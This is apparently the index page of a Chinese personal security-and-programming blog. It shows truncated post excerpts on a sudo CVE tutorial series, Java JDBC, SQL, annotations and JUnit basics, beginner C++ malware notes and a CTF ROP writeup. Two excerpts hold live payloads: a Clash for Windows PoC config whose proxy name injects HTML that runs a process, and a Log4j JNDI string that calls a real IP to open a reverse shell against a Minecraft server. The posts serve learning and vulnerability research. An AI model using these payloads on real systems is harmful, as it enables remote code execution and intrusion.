Joe1sn's Cabin

前文：https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ 受到youtuber：LiveOverflow的系列教程的启发，我发现在中文互联网上并没有相关的翻译教程，所以我想以实验报告的形式来创造这个从fuzz到exp的系列图文教程 原始视频合集：https://www.youtube.com/watch?v=uj1FTiczJSE&list=PLhixgUqwRTjy0gMuT4C3bmjeZjuNQyqdx 原始Blog：https://liveoverflow.com/why-pick-sudo-research-target-part-1/ 原作者代码仓库：https://github.com/LiveOverflow/pwnedit My previous blog: https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ I was inspired by the LiveOverflow’s Sudo Vulnerability Walkthrough on you...

影响版本 Windows v0.19.9版本以下 漏洞复现 漏洞程序连接： https://github.com/Fndroid/clash_for_windows_pkg/releases poc.yaml port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" ...

基本概念 快速入门 对JDBC中各个接口和类详解 JDBC概念 **概念：**Java DataBase Connectivity ，Java数据库连接 本质（类似Django的ORM）:The sun公司定义的一套操作所有关系型数据库的规则（接口）。各个厂家根据接口去实现。我们可以是有这套接口编程，真正的驱动时jar包中的实现类 快速入门 简单步骤 导入驱动jar包 注册驱动 数据库连接对象Connection 定义sql 获取执行SQL语句的Statement对象 执行sql，接受返回结果 处理结果 释放资源 简单使用 package learn.jdbc;import java.sql.Connection;import java.sql.DriverManager;import java.sql.Statement;/*JDBC快速入门 */public class JdbcDemo1 { public static void main(String[] args) throws Exception { //1....

SQL分类 数据查询语言（DQL） 数据查询语言（Data Query Language, DQL）是SQL语言中，负责进行数据查询而不会对数据本身进行修改的语句，这是最基本的SQL语句。保留字SELECT是DQL（也是所有SQL）用得最多的动词，其他DQL常用的保留字有FROM，WHERE，GROUP BY，HAVING和ORDER BY。这些DQL保留字常与其他类型的SQL语句一起使用。 数据定义语言（DDL）(CRUD) 数据定义语言 (Data Definition Language, DDL) 是SQL语言集中，负责数据结构定义与数据库对象定义的语言，由CREATE、ALTER与DROP三个语法所组成，最早是由 Codasyl (Conference on Data Systems Languages) 数据模型开始，现在被纳入 SQL 指令中作为其中一个子集。 数据操纵语言（DML） 数据操纵语言（Data Manipulation Language, DML）是SQL语言中，负责对数据库对象运行数据访问工作的指令集，以INSERT、UPDATE、DE...

注释部分 注解 概念：说明程序。For计算机 从JDK1.5开始，Java增加对元数据的支持，也就是注解，注解与注释是有一定区别的，可以把注解理解为代码里的特殊标记，这些标记可以在编译，类加载，运行时被读取，并执行相应的处理。通过注解开发人员可以在不改变原有代码和逻辑的情况下在源代码中嵌入补充信息。 注释：用文字描述程序。For程序员 作用 编写文档：标识生成doc文档 package LearnJunit.annotation;/** * 注解 java doc演示 * @since 1.5 * @author joe1sn * @version 1.0 */public class AnnoDemo1 { //计算两数之和 public int add(int a, int b){ return a+b; }} javadoc AnnoDemo1.java -encoding UTF-8 -charset UTF-8 正在加载源文件AnnoDemo1.java...正在构造 Java...

Junit单元测试与反射 黑盒-白盒 junit使用：白盒测试 步骤： 定义一个测试类 测试类名：被测试类+Test CalculatorTest 包名：xxx.xxx.xxx.test 定义测试方法：可以独立执行，建议 方法名：test测试方法名 testAdd() 返回值：void（独立运行） 参数列表：空参 方法+@test注解 导入Junit依赖环境 package test;import junit.Calculator;import org.junit.Test;public class CalculatorTest { //测试add方法 @Test public void testAdd(){ //System.out.printf("Excuted"); //创建计算器对象 Calculator c = new Calculator(); //2.调用add方法 int result = c.add(1,2); ...

log4j 还是1day的时候，对minecraft服务器进行漏洞调试 环境搭建 在服务器上搭建了mc服务端，这个照着网上的教程做的 这里用的不是官方包，而是这个：https://www.joe1sn.top/server.jar java版本是 openjdk version "1.8.0_162"OpenJDK Runtime Environment (build 1.8.0_162-8u162-b12-1-b12)OpenJDK 64-Bit Server VM (build 25.162-b12, mixed mode) 特意换的老版本 开始攻击 这里使用了https://github.com/feihong-cs/JNDIExploit这个工具 在本地搭建ngrok代理本地的监听端口 然后生成利用EXP ${jndi:ldap://150.158.75.102:1389/Basic/ReverseShell/3.133.207.110/13605} 登陆服务器在聊天框中输入 回车等待后getshell 但是服务器会崩...

C++恶意软件入门笔记，高中看的一本书，大二小小实践一下 简单的Windows API 复制自身到Windows目录 1-1.获得程序自生API DWORD GetModuleFileName 1-2.获得windows目录 UINT GetWindowsDirectory 1-3.拷贝文件 BOOL CopyFile 获得系统基本参数 2-1.获得操作系统版本 BOOL GetVersionEx typedef struct _OSVERSIONINFOA { DWORD dwOSVersionInfoSize; DWORD dwMajorVersion; DWORD dwMinorVersion; DWORD dwBuildNumber; DWORD dwPlatformId; CHAR szCSDVersion[128]; // Maintenance string for PSS usage } OS...

buu部分刷题记录 [HarekazeCTF2019]baby_rop 1.checksec() Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000) 2.IDA main int __cdecl main(int argc, const char **argv, const char **envp){ char v4; // [rsp+0h] [rbp-10h] system("echo -n \"What's your name? \""); __isoc99_scanf("%s", &v4); printf("Welcome to the Pwn World, %s!\n", &v4); return 0;} scanf的溢出，注意，要溢出的栈+...